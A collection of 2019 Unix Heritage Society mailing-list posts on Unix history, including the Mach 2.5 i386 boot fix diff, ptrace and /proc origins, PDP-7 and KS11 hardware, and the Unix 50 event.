In the 20 years since the release of the CSRG CD-ROM Set (1998-2018) I have continued collecting old software which I have put together in two historic collections. The first is various historic UNIX distributions not from Berkeley. The second is programs and other operating systems that shipped on or influenced BSD. The distribution is contained on a single DVD that contains all the original content from the original 4-CD-ROM distribution, these two collections of historic software, and a copy of John Baldwin's conversion of the SCCS database contained on the original disk4 to a Subversion repository. Unlike most write-once technology which remains readable for less than ten years, this DVD is written using M-Disc technology which should last for centuries. The price for the DVD is $149.00.
I know the $150 USD may sound pricy but the historic2 archive does contain a couple additional copies of Mach!
And a bunch of other stuff in there as well, it’s gigabytes of stuff to go through.
Tom Van Vleck just passed this on the Multics mailing list. Fernando
Corbató has passed away at 93.
https://www.nytimes.com/2019/07/12/science/fernando-corbato-dead.html
Clem organized the wonderful Unix 50 event at the LCM two days ago, where
we saw a working 6180 front panel on display (backed by a virtual DPS-8m
running Multics!).
This is our heritage and our history, let us not forget where we came from.
- Dan C.
Interactive Systems. Now there’s a name I’ve not heard in many a year. Heinz Lycklama went there.
The did a couple of things, a straight UNIX port to various things (PDP-11, 386) and also there “UNIX running under VMS” product.
They also had their own version of the Rand Editor called “INed” that was happiest on this hacked version of a Perkin Elmer terminal.
Early versions were PWB UNIX based if I recall.
My first job out of college was working with IS Unix on an 11/70 playing configuration management (essentially all the PWB stuff). I also hacked the line printer spooler and the .mm macro package to do classification markings (this was a part of a government contract).
A few years later I was given the job of porting Interactive Systems UNIX that was already running on an i386 (an Intel 310 system which had a Multibus I) to an Intel Multibus II box. Intel had already ported it once, but nobody seemed to be able to find the source code. So with a fresh set of the source code for the old system from IS, I proceeded to reverse engineer/port the code to the Message Passing Coprocessor. (Intel was not real forthcoming for documentation for that either). Eventually, I got it to work (the Multibus II really was a pleasant bus and worked well with UNIX). I went on to write drivers for a 9-track tape drive (which sat in my living room for a long time), a Matrox multibus II framebuffer (OK, that had problems), and a SCSI host adapter that was talking to this kludge device that captured digital data from a FLIR on uMatic cassettes (but that’s a different story).
In honor of the Unix 50 party tomorrow, I wrote an analysis of the
available data to conclude the first PDP-7 that Ken and Dennis used to
bring up Unix on was serial number 34. I've not seen this result elsewhere,
but if it's common place, please let me know.
https://bsdimp.blogspot.com/2019/07/the-pdp-7-where-unix-began.html
One surprise from the analysis: there was only one pdp-7 in the world that
could have run the original v0 unix. It's the only one that had the RB09
hard drive (though the asset list referenced in the article listed a RC09
on that system).
I hope you enjoy
Warner
Back in the day I had the pleasure of firing up what was possibly
the last North American BITNET node (certainly the last one on
NetNorth), on a Sun 3/xxx deskside server running SunOS 3.5(+).
(AUCS, at Athabasca U.)
I'm curious to know if the UREP source code that drove that link
ever escaped. I recall it being licensed code at the time, but
from academia vs. a commercial product. I don't know if that also
applied to the bisync serial driver.
--lyndon
> From: "Nelson H. F. Beebe"
> In our PDP-10 TOPS-20 archive of what was then utah-science .. I find
> these files:
Thanks very much for doing that search, and congratulations on finding them!
Not that I have the slightest interest/use in the results, but it's so good to
see historical software being saved.
Noel
Postal mail today brought me the latest issue of the IEEE Computing
Edge magazine, which presents short articles from other recent IEEE
publications. In it, there is an article with numerous mentions of
Doug McIlroy, early Unix, software tools, and software modularization:
Gerard J. Holzmann
Software Components
IEEE Computing Edge 5(7) (July 2019) 38--40
https://ieeexplore.ieee.org/document/8354432
[republished from IEEE Software 35(3) (May/June 2018) 80--82]
-------------------------------------------------------------------------------
- Nelson H. F. Beebe Tel: +1 801 581 5254 -
- University of Utah FAX: +1 801 581 4148 -
- Department of Mathematics, 110 LCB Internet e-mail: beebe(a)math.utah.edu -
- 155 S 1400 E RM 233 beebe(a)acm.org beebe(a)computer.org -
- Salt Lake City, UT 84112-0090, USA URL: http://www.math.utah.edu/~beebe/ -
-------------------------------------------------------------------------------
I wouldn't call it an error, merely a misleading sentence. .EX/.EE is,
after all, an extension in Gnu, albeit not original to Gnu. And I
didn't intend to impugn anybody. The sentence, "Ingo Schwarze stated
incorrectly" was apparently slipped into the quotation to provide
missing context. I do appreciate, however, how quickly the
inexactness was repaired.
Doug
| Doug McIlroy wrote on Mon, Jul 08, 2019 at 11:17:32PM -0400:
| > Ingo Schwarze stated incorrectly:
|
| >> EE This is a non-standard GNU extension. In mandoc(1), it does the
| >> same as the roff(7) fi request (switch to fill mode).
|
| >>
| >> EX This is a non-standard GNU extension. In mandoc(1), it does the
| >> same as the roff(7) nf request (switch to no-fill mode).
|
| > "Gnu extension" should be read as "extension adopted by Gnu".
| > .EX/.EE was introduced in 9th Edition Unix.
|
| Thank you for pointing out the error, i corrected the manual page
| in OpenBSD and in portable mandoc, see the commit below.
Just sync my personal copy with the tuhs archive.
Looks like there are a lot of Mac preview files (that start with ._) mixed
in. Is that on purpose?
Warner
Dear all,
Apologies for this semi-spam message from a long-time appreciator of classic computers and nostalgic obsolete products, but I hope this will be of interest to at least a few people here.
So, yes, by way of context, I've been acquiring what I consider to be characterful and/or historically interesting computers for coming up to, maybe, 15 years now, with the intention of being able to curate multiple, interactive temporary exhibits on the history of computing, but since moving continents (amongst other things), my paths and passions have changed, so I am currently in the process of re-testing (and repairing) my machines, and will be trying to sell them off in the coming weeks and months. Under different circumstances, finding people (or groups) with similar interests and plans would have been an equal-first priority, but given my more recent 'life changes', sale price — and the ability to better pursue my new focuses — is now more of a factor.
(That said, if you are (or know) a developer of an open source machine emulator who could use one of these machines --- particularly one of the more obscure ones --- please do get in touch, as the prospect of people being able to keep older / rarer operating systems and software running once the physical machines are not longer available or working /is/ actually still kinda important to me, and I'd be open to a lower price and/or setting up some remote access with some kind of kludged-together iLO and vaguely 'dual-ported' disk access via, e.g., an SD2SCSI setup.)
But before I list them on eBay (and/or by way of a heads up), I wanted to let people here know, just in case I have something that someone here particularly wants / needs / could use. The current list of systems I will be parting with is accessible at https://docs.google.com/spreadsheets/d/1QqUrO11gnn4fwAPDxqO_phKDt1M0O15G7wJ… but some (hopefully) highlights include (*big breath*):
DEC: MicroPDP-11/53+; MicroVAX 2000; VAXstation 4000 VLC/60/90A/96; VAX 4000 100A, 105; DECstation 5000/240, 260 (MIPS-based); DEC 3000/300X; Personal Workstation 600au; AlphaServer 4100; AlphaServer DS20, DS25 systems; Letterwriter 100; VT 101, 220, 520 terminals
HP: HP rx2800 Integrity2; 9000 715/100 and Visualize C110 PA-RISC systems
SGI: Indy and O2 systems
SUN: ELC, SPARCstation Voyager (the portable one), 5 and 20; Ultra 1; Ultra 5; Netra T1-105; Enterprise T5240
Apple: IIc, IIe Platinums, IIgs; Mac 512ke, Mac Pluses; SE/30 and Quadra 700s (also for running A/UX); iMac G3s and a G4
Commodore: PET 3000 systems, PET 8032-SK; various C64 / C64C and 128D systems; SX-64; Music Maker keyboards (the big one, inc. SFX modules); Amiga 1000
Apologies again, please feel free to contact me with any queries or reasonable offers, or even if you'd just like to be kept in the loop as more machines become available, and all the best.
Thanks in advance,
Peter
P.S. In light of the responses I've received to posts I've made elsewhere, I've included a 'Default Reserve' price in the aforementioned spreadsheet. I've written more about this there, but the gist of it is that, given that very few of the more obscure / awesome machines have gone through eBay recently, it's kinda hard for me to gauge what a fair and reasonable (to me and the future buyers) price is for quite a few of my machines --- I've started to put in rough figures for /some/ of them based upon 'what feels right', but if there's nothing there, please don't ask me what I might want for them as I don't know yet (though do feel free to make me an offer). Thanks again!
As promised here is the diff & misc info on the build. I installed the Mt Xinu disks to create a build environment and uucp’d the sources from CD#4 of Kirks’ CSRG set (/local/MACH/386/sys).
Grepping the source reveals it to be MK35. Which makes sense from the release notes as this was an i386 only release:
------8<------8<------8<------8<
***** MK Version MK35 (rvb) *****
This is an I386 architecture release only. It has been tested
on an AT as well as the hypercube.
No New features:
--- --------
Except possibly that the if_pc586.c is not timing dependent
any more.
The big deal about this release is that all the files in the
i386at directory and the files in Mach2.5 I386q are identical --
that is all improvements in the mainline have been merged to
the 3.0 code and vice versa. NOTE: the 3.0 com driver has
not been tested cause I did not have any hardware. Also I
have lpr and if_par drivers that I did not even install for
the same reason. (I needed to install com.c for the mouse
support code.)
ALSO, this release has the Prime copyrights changed to something
less threatening, courtesy of Prime Computer Inc.
Bug fix:
The panic that rfr reported with the ram_to_ptr is no longer
possible.
------8<------8<------8<------8<
For people who like DMESG’s here it is:
------8<------8<------8<------8<
boot:
442336+46792+115216[+38940+39072]
Insert file system
Sÿ boot: memory from 0x1000 to 0x7d0000
Kernel virtual space from 0xc0000000 to 0xc25d0000.
Available physical space from 0xa000 to 0x7d0000
i386_init: virtual_avail = c07d0000, virtual_end = c25d0000
end c01938d8, sym c01938dc(981c) str = c019d0f8(98a4)
[ preserving 78016 bytes of symbol table ]
Mach/4.3 #5.1(I386x): Wed Jan 20 00:45:55 WET 1988; obj/STD+WS-afs-nfs (localhost)
physical memory = 7.81 megabytes. vm_page_free_count = 689
using 200 buffers containing 0.78 megabytes of memory
available memory = 5.55 megabytes. vm_page_free_count = 58e
fdc0: port = 3f2, spl = 5, pic = 6.
fd0: port = 3f2, spl = 5, pic = 6. (controller 0, slave 0)
fd1: port = 3f2, spl = 5, pic = 6. (controller 0, slave 1)
com0: port = 3f8, spl = 6, pic = 4. (DOS COM1)
lpr0: port = 378, spl = 6, pic = 7.
par0: port = 378, spl = 6, pic = 7.
root on `b
------8<------8<------8<------8<
The diff from the CD is as follows:
------8<------8<------8<------8<
jsteve@2006macpro:/mnt/c/temp/csrg$ diff -ruN sys mach25-i386
diff -ruN sys/Makeconf mach25-i386/Makeconf
--- sys/Makeconf 1970-01-01 08:00:00.000000000 +0800
+++ mach25-i386/Makeconf 2019-06-24 15:24:49.000000000 +0800
@@ -0,0 +1,102 @@
+#
+# Mach Operating System
+# Copyright (c) 1989 Carnegie-Mellon University
+# All rights reserved. The CMU software License Agreement specifies
+# the terms and conditions for use and redistribution.
+#
+#
+# HISTORY
+# $Log: Makeconf,v $
+# Revision 2.16 91/09/25 18:51:17 mja
+# Fix VAX_CONFIG so that processor number component is last (for
+# SUP wild-carding to work); make MMAX_CONFIG consistent with
+# other platforms as STD+ANY+EXP+64.
+# [91/09/25 18:41:59 mja]
+#
+# Revision 2.15 91/09/24 20:07:07 mja
+# Require new ${KERNEL_SERIES} macro in place of old ${RELEASE}
+# even to specify the "latest" series; add temporary
+# ${ENVIRON_BASE}; add silent include of Makeconf-local.
+# [91/09/22 03:16:36 mja]
+#
+# Add SITE; set SOURCEDIR to MASTERSOURCEDIR if present (for build).
+# [91/09/21 18:06:08 mja]
+#
+# Revision 2.14 91/08/30 09:37:19 berman
+# Set up default config for MMAX which is STD+MP (multiprocessor)
+# [91/07/30 12:19:40 ern]
+#
+# Revision 2.13 91/04/02 16:04:53 mbj
+# Added {I,AT}386_CONFIG=STD+WS+EXP lines.
+# Changed ${MACHINE} references to ${TARGET_MACHINE}.
+#
+# Revision 2.12 90/08/30 12:24:52 bohman
+# Changes for mac2.
+# [90/08/28 bohman]
+#
+# Revision 2.11 89/09/25 22:43:32 mja
+# Correct mis-merged OBJECTDIR.
+#
+# Revision 2.10 89/09/25 22:20:03 mja
+# Use SOURCEDIR instead of VPATH for shadowing. This means we
+# can do away with the SRCSUFFIX stuff which "make" does by
+# itself, and that Makefiles can use VPATH themselves. I also
+# "simplified" the definition of CONFIG and "release_...".
+# [89/07/06 bww]
+#
+# Revision 2.9 89/08/08 21:44:58 jsb
+# Defined PMAX_CONFIG.
+# [89/08/03 rvb]
+#
+# Revision 2.8 89/07/12 23:02:52 jjc
+# Defined SUN4_CONFIG.
+# [89/07/12 23:01:03 jjc]
+#
+# Revision 2.7 89/04/10 00:34:59 rpd
+# Changed OBJECTDIR name to correspond to new organization.
+# [89/04/06 mrt]
+#
+# Revision 2.6 89/02/25 14:12:18 gm0w
+# Changes for cleanup.
+#
+# Revision 2.5 89/02/25 14:08:30 gm0w
+# Changes for cleanup.
+#
+# Revision 2.4 88/11/14 15:04:01 gm0w
+# Changed the standard configurations to correspond
+# to the new names.
+# [88/11/02 15:45:44 mrt]
+#
+# Revision 2.3 88/09/07 15:44:43 rpd
+# Moved CONFIG macros here from Makefile, so that the user
+# can easily customize them by modifying Makeconf.
+# [88/09/07 01:52:32 rpd]
+#
+# Revision 2.2 88/07/15 15:11:46 mja
+# Created.
+#
+
+VAX_CONFIG = STD+ANY+EXP+16
+mac2_CONFIG = MACMACH-macos_emul
+I386_CONFIG = STD+WS+EXP
+AT386_CONFIG = STD+WS+EXP
+MMAX_CONFIG = STD+ANY+EXP+64
+
+#CONFIG = ${${TARGET_MACHINE}_CONFIG?${${TARGET_MACHINE}_CONFIG}:STD+ANY+EXP}
+#CONFIG = STD+WS+EXP-afs-nfs
+CONFIG = STD+WS-afs-nfs
+
+SITE = CMUCS
+
+SOURCEDIR = ${MASTERSOURCEDIR?${MASTERSOURCEDIR}:${SRCBASE}}
+
+#OBJECTDIR = ../../../obj/@sys/kernel/${KERNEL_SERIES}
+OBJECTDIR = ./obj
+
+# XXX until build is fixed to set these XXX
+ENVIRON_BASE = ${RELEASE_BASE}
+
+.EXPORT: ENVIRON_BASE
+
+# Provide for private customizations in a shadow directory
+-include Makeconf-local
diff -ruN sys/Makefile mach25-i386/Makefile
--- sys/Makefile 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/Makefile 2019-06-24 15:24:49.000000000 +0800
@@ -206,6 +206,12 @@
at386_cpu=i386
sun4_cpu=sun4
cpu=$(${machine}_cpu)
+#echo "CPU IS $cpu"
+AT386_cpu=i386
+I386_cpu=i386
+cpu=${${TARGET_MACHINE}_cpu?${${TARGET_MACHINE}_cpu}:${target_machine}}
+#echo "CPU IS $cpu"
+
VAX_OUTPUT=Makefile
SUN_OUTPUT=Makefile
diff -ruN sys/conf/newvers.sh mach25-i386/conf/newvers.sh
--- sys/conf/newvers.sh 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/conf/newvers.sh 2019-06-24 15:25:15.000000000 +0800
@@ -56,8 +56,17 @@
v="${major}.${minor}(${variant}${edit}${patch})" d=`pwd` h=`hostname` t=`date`
CONFIG=`cat vers.config`
if [ -z "$d" -o -z "$h" -o -z "$t" -o -z "${CONFIG}" ]; then
- exit 1
+# exit 1
+edit="386"
+major=5
+minor=1
+variant="I"
+patch="x"
+copyright="/copyright.txt"
+v="${major}.${minor}(${variant}${edit}${patch})" d=`pwd` h=`hostname` t=`date`
fi
+#
+
d=`expr "$d" : '.*/\([^/]*\)/[^/]*$'`/${CONFIG}
(
/bin/echo "int version_major = ${major};" ;
diff -ruN sys/i386/start.s mach25-i386/i386/start.s
--- sys/i386/start.s 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/i386/start.s 2019-07-01 23:47:25.208021800 +0800
@@ -210,13 +210,14 @@
lgdt (%eax)
+ / flip cr3 before you flip cr0
+ mov %edx, %cr3
+
/ turn PG on
mov %cr0, %eax
or $PAGEBIT, %eax
mov %eax, %cr0
- mov %edx, %cr3
-
ljmp $KTSSSEL, $0x0
/ *********************************************************************
diff -ruN sys/standi386at/boot/disk.c mach25-i386/standi386at/boot/disk.c
--- sys/standi386at/boot/disk.c 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/standi386at/boot/disk.c 2019-07-01 23:51:11.261850100 +0800
@@ -340,11 +340,11 @@
#ifndef FIND_PART
*rel_off = vp->part[part].p_start;
- if (vp->part[part].p_tag != V_ROOT)
+ if (vp->part[part].p_flag != V_ROOT)
printf("warning... partition %d not root\n", part);
#else
for (i = 0; i < vp->nparts; i++)
- if (vp->part[i].p_tag == V_ROOT)
+ if (vp->part[i].p_flag == V_ROOT)
break;
if (i == vp->nparts) {
------8<------8<------8<------8<
I finally got a chance to talk to someone who knows a hell of a lot about the i386 than I could ever hope to know. I gave him all the materials and I think he spent more time replying to my email than doing the debugging.
Basically the registers for entering protected mode with paging are backwards. This is kind of funny as the port was done by Intel of all people.
Anyway I reversed them and I now have the Mach kernel from 1988 booted under VMware.
I have to say that it's super cool to finally have chased this one down.
Does anyone know whether CMU’s local Mach sources have been preserved?
I’m not just talking about MK84.default.tar.Z and so on, I’m talking about all the bits of Mach that were used on cluster systems on campus, prior to the switch to vendor UNIX.
I know at least one person who had complete MacMach sources for the last version, but threw out the backup discs with the sources in the process of moving. So I know they exist.
If nothing else, CMU did provide other sites their UX source package (eg UX42), which was the BSD single server environment. So I know that has to be out there, somewhere.
— Chris
Sent from my iPhone
All, a while back Debbie Scherrer mailed me a copy of a
"Software Tools Users Group" archive, and I've been sitting on my
hands and forgetting to add it to the Unix Archive. It's now here:
https://www.tuhs.org/Archive/Applications/Software_Tools/STUG_Archive/
The mirrors should pick it up soon. I've gzipped most of it as I'm getting
a bit tight on space.
Thanks to Debbie for the copy and to her and Clem for reminding me to
pull my finger out :)
Cheers, Warren
It's interesting that this comment about ptrace was written
as early as 1980.
Ron Minnich's reference to Plan 9 /proc misses the mark, though.
By the time Plan 9 was written, System V already had /proc; see
https://www.usenix.org/sites/default/files/usenix_winter91_faulkner.pdf
And as the authors say, the idea actually dates back to Tom Killian's
/proc in Research UNIX. I don't know when Tom's code first went
live, but I first heard about it by seeing it in action on my first
visit to Bell Labs in early 1984, and it was described in public in
a talk at the Summer 1984 USENIX conference in Salt Lake City.
I cannot quickly find an online copy of the corresponding paper;
pointers appreciated. (Is there at least an online index of BTL
CSTRs? The big search engine run by the place that still has
some 1127 old-timers can't find that either.)
As for ptrace itself, I heartily agree that /proc made it obsolete.
So did everyone else in 1127 when I was there, but nobody wanted
to update adb and sdb, which were big messes inside. So I did,
attempting a substantial internal makeover of adb to ease making
versions for different systems and even cross-versions, but just
a quick hack for sdb.
Once I'd done that and shipped the new adb and sdb binaries to
all our machines, I removed the ptrace call from the kernel.
It happened that in the Eighth (or was it Ninth by then? I'd
have to dig out notes to find out) Edition manual, ptrace(2)
was on two facing pages. To celebrate, I glued said pages
together in the UNIX Room's copy of the manual.
Would it were so easy to take out the trash today.
Norman Wilson
Toronto ON
The paper I am thinking of (gee, I wish I could remember any other details
about it...) was *very* detailed and specific, and was hardware-specific
to either the PDP-11 or VAX. It would not at all be applicable to Linux
or any kind of modern OS.
I am wondering if it is something in the Leffler et al book, I'll have to
go back and review that. I'll have to find my copy of it first...
--Pat.
A few bods have asked to see this, so... Actually, "extracted" would be
better description than "redacted", but it's too late now; I could rename
it and put in a CGI-redirect, but I'm too busy at the moment.
-----
A redacted copy of my complaint to T$.
www.horsfall.org/Telstra-comp-redact.rtf (yes, RTF; it was written on a
Mac).
Utterly inexcusable... Please share etc :-)
-- Dave
Ptrace was short-lived at Research, appearing in 6th through 8th editions.
/proc was introduced in the 8th. Norman axed it in the 9th.
Norman wrote:
nobody wanted
to update adb and sdb, which were big messes inside. So I did
...
Once I'd done that and shipped the new adb and sdb binaries to
all our machines, I removed the ptrace call from the kernel.
doug
> From: ron minnich <rminnich(a)gmail.com>
> To: TUHS main list <tuhs(a)minnie.tuhs.org>
> Subject: [TUHS] 4.1c bsd ptrace man entry ("ptrace is unique and
> arcane")
> Message-ID:
> <CAP6exYJshbA5HxOJ_iM21Cs0Y4vGfLuFigXxh4WTeqbZreY8UA(a)mail.gmail.com>
> Content-Type: text/plain; charset="UTF-8"
>
> I always wondered who wrote this, anyone know? I have my suspicions but ...
>
> ".SH BUGS
> .I Ptrace
> is unique and arcane; it should be replaced with a special file which
> can be opened and read and written. The control functions could then
> be implemented with
> .IR ioctl (2)
> calls on this file. This would be simpler to understand and have much
> higher performance."
>
> it's interesting in the light of the later plan 9 proc interface.
>
> ron
The manual pages were not yet under SCCS, so the best time gap that I
can give you is that the above text was added between the release of
3BSD (Nov 1979) and 4.0BSD (Nov 1980). Most likely it was Bill Joy
that made that change.
Kirk McKusick
I always wondered who wrote this, anyone know? I have my suspicions but ...
".SH BUGS
.I Ptrace
is unique and arcane; it should be replaced with a special file which
can be opened and read and written. The control functions could then
be implemented with
.IR ioctl (2)
calls on this file. This would be simpler to understand and have much
higher performance."
it's interesting in the light of the later plan 9 proc interface.
ron
Hi All.
Scott Lee, who worked with me on the Georgia Tech Software Tools
Subystem for Pr1me Computers, recently unearthed two tapes with
some version of that software. These may be the only copies
extant anywhere.
He says:
| I was cleaning out the basement of my house. They're 35 years old, but
| they've never been left in the heat or anything. I opened one of them
| up and checked the tape and it's not self-sticky or anything. The odds
| that they're readable is slim, because old 9-track bits tended to bleed
| through each other. You were supposed to spin through the tape every
| couple of years to make them last longer. That's obviously not happened.
There was discussion here a while back about services that will
recover such tapes and so on. But I didn't save any of that information.
If you have information, PLEASE send it to me so that I can relay it
to Scott.
Dennis Boone & Bill Gunshannon (are you on this list?) - I may ask you
to contribute $$ towards this once I know more.
Thanks!
Arnold
> From: Andrew Warkentin
> Mach and the other kernels influenced by it basically destroyed the
> reputation of microkernels ... a simple read() of a disk file, which is
> a single kernel call on a monolithic kernel and usually two context
> switches on QNX, takes at least 8 context switches - client->VFS->disk
> FS->partition driver->disk driver and back again).
Hammer-nail syndrome.
When the only tool you have for creating separate subsystems is processes, you
wind up with a lot of processes. Who'd a thunk it.
A system with a segmented memory which allows subroutine calls from one subsystem
to another will have a lot less overhead. It does take hardware support to be
really efficient, though. The x86 processors had that support, until Intel dropped
it from the latest ones because nobody used it.
Excuse me while I go bang my head on a very hard wall until the pain stops.
Noel
This is an appeal to the few really-old-timers (i.e. who used the PDP-11/20
version of Unix) on the list to see if they remember _anything_ of the KS11
memory mapping unit used on that machine.
Next to nothing is known of the KS11. Dennis' page "Odd Comments and Strange
Doings in Unix":
https://www.bell-labs.com/usr/dmr/www/odd.html
has a story involving it (at the end), and that is all I've ever been able
to find out about it.
I don't expect documentation, but I am hoping someone will remember
_basically_ what it did. My original guess as to its functionality, from that
page, was that it's not part of the CPU, but a UNIBUS device, placed between
the UNIBUS leaving the CPU, and the rest of the the bus, which perhaps mapped
addresses around (and definitely limited user access to I/O page addresses).
It might also have mapped part of the UNIBUS space which the -11/20 CPU _can_
see (i.e. in the 0-56KB range) up to UNIBUS higher addresses, where 'extra'
memory is configured - but that's just a guess; but it is an example of the
kind of info I'd like to find out about it - just the briefest of high-level
descriptions would be an improvement on what little we have now!
On re-reading that page, I see it apparently supported some sort of
user/kernel mode distinction, which might have require a tie-in to the
CPU. (But not necessarily; if there was a flop in the KS11 which stored the
'CPU mode' bit, it might be automatically cleared on all interrupts. Not sure
how it would have handled traps, though.)
Even extremely dim memories will be an improvement on the blank canvas we
have now!
Noel
> From: Rudi Blom
> Probably already known, but to be sure Interesting options: MX11 -
> Memory Extension Option: this enabled the usage of 128 KW memory (18-bit
> addressing range)
Actually, I didn't know of that; something else to track down. Wrong list
for that, though.
Noel
Probably already known, but to be sure
Interesting options: MX11 - Memory Extension Option: this enabled the
usage of 128 KW memory (18-bit addressing range); KS11: this option
provided hardware memory protection, which the plain /20 lacked. Both
options were developed by the Digital CSS (Computer Special Systems).
http://hampage.hu/pdp-11/1120.html
PS the page listed below has a very nice picture of the 'two fathers
of UNIX" working on a PDP-11/20
http://hampage.hu/unix/unix1.html
Kevin Bowling:
The conference looks supremely uninteresting outside one WAFL talk to me.
====
That is, of course, a matter of opinion. Just from skimming
titles I see about two dozen talks of at least some interest
to me in the ATC program. And that's just ATC; I'm planning
to attend the Hot* workshops on Monday and Tuesday as well.
Of course I won't attend every one of those talks--some coincide
in time, some I'll miss because I get stuck in the hallway track.
And some will prove less interesting in practice, though others
that don't seem all that interesting in the program will likely
prove much better in person.
I've been attending USENIX ATC for decades, and although some
conferences have been meatier than others, I've never ended up
feeling the trip was a waste of time.
Perhaps us old farts just aren't as discriminating as you
youngsters.
That said, I think Kevin's question
Is there a way to participate [on the UNIX50 event] without attending Usenix ATC?
is a good one.
Norman Wilson
Toronto ON
Bud Lawson, long an expat living in Sweden, died yesterday. Not a
Unix person, he was, however, the originator of a characteristic Unix
programmer's idiom.
Using an idea adapted from Ken Knowlton, Bud invented the pointer-
chasing arrow operator that Dennis Ritchie adopted for C. I played
matchmaker. When Bud first proposed the "based storage" (pointer)
facility for PL/I, he used the well-established field(pointer)
notation. I introduced him to the pointer-chasing notation Knowlton
devised for L6. Knowlton, however, had no operator because he had only
single-letter identifiers. What we now write as a->b->c, Knowlton wrote
as abc. Appreciating the absence of parentheses, Bud came up with the
wonderfully intuitive pointer->field notation.
Doug
I came across Scott Taylor’s site which mentions his adventure with MtXinu (https://www.retrosys.net/) I had asked a few years ago (February 2017?) about locating a set
Of this to no avail, but thanks to Scott the binary set is now available.
ftp://ftp.mrynet.com/operatingsystems/Mach2.5/MtXinu-binary-dist/floppies/M…
There is some additional documentation to be found here.
ftp://ftp.mrynet.com/operatingsystems/Mach2.5/MtXinu-binary-dist/docs
The floppy drive like 386BSD is super weak and I had no luck with Qemu. VMWare worked fine to install. The VMDK will run on Qemu as low as 0.90 just fine.
I haven’t tried the networking at all, so I don’t know about adapters/protocol support. I’ve been using a serial line to uuencode stuff in & out but it’s been stable.
We are all thrilled and thankful for the generosity of SDF and LCM+L by
sponsoring and providing a celebration of Internet History with their UNIX
at 50 Event for the USENIX ATC Attendees. We understand not all of you
can participate in the conference, but would still like to be part of the
celebration. Our hosts have graciously opened the event to the community
at large, as I said in my previous message, it should be an evening of
computer people being able to be around and discussing computer history.
However, if you are not planning to attend the conference but wish to
attend the evening's event, we wish that you would at least consider
joining one or more of the organizations to help support them all in the
future. All three organizations are members supported and need all our help
and contributions to function and bring their services to everyone today
and hopefully 50 years from now. Membership details for each can be found
at Join SDF <https://sdf.org/join>, LCM+L Memberships
<https://livingcomputers.org/Join/Memberships.aspx>, and USENIX Association
Memberships <https://www.usenix.org/membership-services>
ᐧ
I've been playing with simh recently, and there is a nonzero chance I will
soon be acquiring a PDP/11-70.
I realize I could run 2.11BSD on it, and as long as I stay away from a
networking stack, I probably won't see too many coremap overflow errors.
But I think I'd really rather run V7.
However, there's one thing that makes it a less than ideal environment for
me. I grew up after cursor-addressable terminals were a thing, and, even
if I can eventually make "ed" do what I want, it isn't much fun. I've been
an Emacs user since 1988 and my muscle memory isn't going to change soon
(and failing being able to find and build Gosmacs or an early GNU Emacs,
yes, I can get by in vi more easily than in ed; all those years playing
Nethack poorly were good for something).
So...where can I find a curses implementation (and really all I need in the
termcap or terminfo layer is ANSI or VTxxx) that can be coerced into
building on V7 pretty easily?
Also, I think folks here might enjoy reading a little personal travelogue
of some early Unix systems from my perspective (which is to say, a happy
user of Unix for 30+ years but hardly ever near core development (I did do
the DIAG 250 block driver for the zSeries port of OpenSolaris; then IBM
pushed a little too hard on the price and Sun sold itself to (ugh) Oracle
instead; the world would have been more fun if IBM had bought the company
like we were betting on)). That's at
https://athornton.dreamwidth.org/14340.html ; that in turn references a
review I did about a year ago of The Unix Hater's Handbook, at
https://athornton.dreamwidth.org/14272.html .
Adam
> From: Mary Ann Horton
> Warren's emacs would have been part of the Bell Labs 'exptools'
> (experimental tools) package ... it's possible that's what you have.
I don't think so; Warren had been a grad student in our group, and we got it
on that basis. I'm pretty sure we didn't have termcap or any of that stuff.
Noel
I'm reminded since Erik brought this up...
Is Warren Montgomery's emacs available, like, anywhere... I used it long
ago on V7m, and I had it on my AT&T 7300 (where it was available as a
binary package).
It's the first emacs I ever used. I don't recall where we got it for the
PDP-11. On our system, we had it permission-restricted so only certain
trusted users could use it - basically, people who could be trusted not to
be in it all the time, and not to use it while the system was busy. We
had an 11/40 with 128K, and 2 or 3 people trying to use Mongomery emacs
would basically crush the system...
In the absence of that, I've always found JOVE to be the next best thing,
as far as being lightweight and sufficently emacs-like. I actually
install it on almost all of my Linux systems. Did JOVE ever run on V7?
--Pat.
> From: Pat Barron
> Is Warren Montgomery's emacs available, like, anywhere...
I've got a copy on the dump of the MIT PWB system. I'm actually supposed to
resurrect it for someone, IIRC, (the MIT system was .. idiosyncratic, so it'll
take a bit of tweaking), but haven't gotten to it yet.
Does anyone else have the source, or is mine the only one left?
Noel
Sorry for the long delay on this notice, but until this weekend there were
still a few things to iron out before I made a broad announcement.
First, I want to thank the wonderful folks at the Living Computers Museum
and Labs <https://livingcomputers.org/> who are set up to host an event at
their museum for our members on the evening of July 10, which is during the
week of USENIX ATC. To quote an email from their Curator, Aaron Alcorn: "*an
easy-going members events with USENIX attendees as their special invited
guests.*" As Aaron suggested, this event will just be computer people
and computers, which seems fitting and a good match ;-)
Our desire is to have as many of the old and new 'UNIX folks' at this event
as possible and we can share stories of how our community got to where we
are. Please spread the word, since we want to get as many people coming
and sharing as we can. BTW: The Museum is hoping to have their
refurbished PDP-7 running by that date. A couple of us on this list will
be bringing a kit of SW in the hopes that we can boot Unix V0!!
Second, USENIX BOD will provide us a room at ATC all week long to set up
equipment and show off some things our community has done in the past. I
have been in contact with some of you offline and will continue to do so.
There should be some smaller historical systems that people will bring
(plus connections to the LCM's systems via the Internet, of course) and
there will be some RPi's running different emulators.
I do hope that both the event and the computer room should be fun for all.
Thanks,
Clem Cole
I think it was BSD 4.1 that added quotas to the disk system, and I was just wondering if anyone ever used them, in academia or industry. As a user and an admin I never used this and, while I thought it was interesting, just figured that the users would sort it out amongst themselves. Which they mostly did.
So, anyone ever use this feature?
David
Several list members report having used, or suffered under, filesystem
quotas.
At the University Utah, in the College of Science, and later, the
Department of Mathematics, we have always had an opposing view:
Disk quotas are magic meaningless numbers imposed by some bozo
ignorant system administrator in order to prevent users from
getting their work done.
Thus, in my 41 years of systems management at Utah, we have not had a
SINGLE SYSTEM with user disk quotas enabled.
We have run PDP-11s with RT-11, RSX, and RSTS, PDP-10s with TOPS-20,
VAXes with VMS and BSD Unix, an Ardent Titan, a Stardent, a Cray
EL/94, and hundreds of Unix workstations from Apple, DEC, Dell, HP,
IBM, NeXT, SGI, and Sun with numerous CPU families (Alpha, Arm, MC68K,
SPARC, MIPS, NS 88000, PowerPC, x86, x86_64, and maybe others that I
forget at the moment).
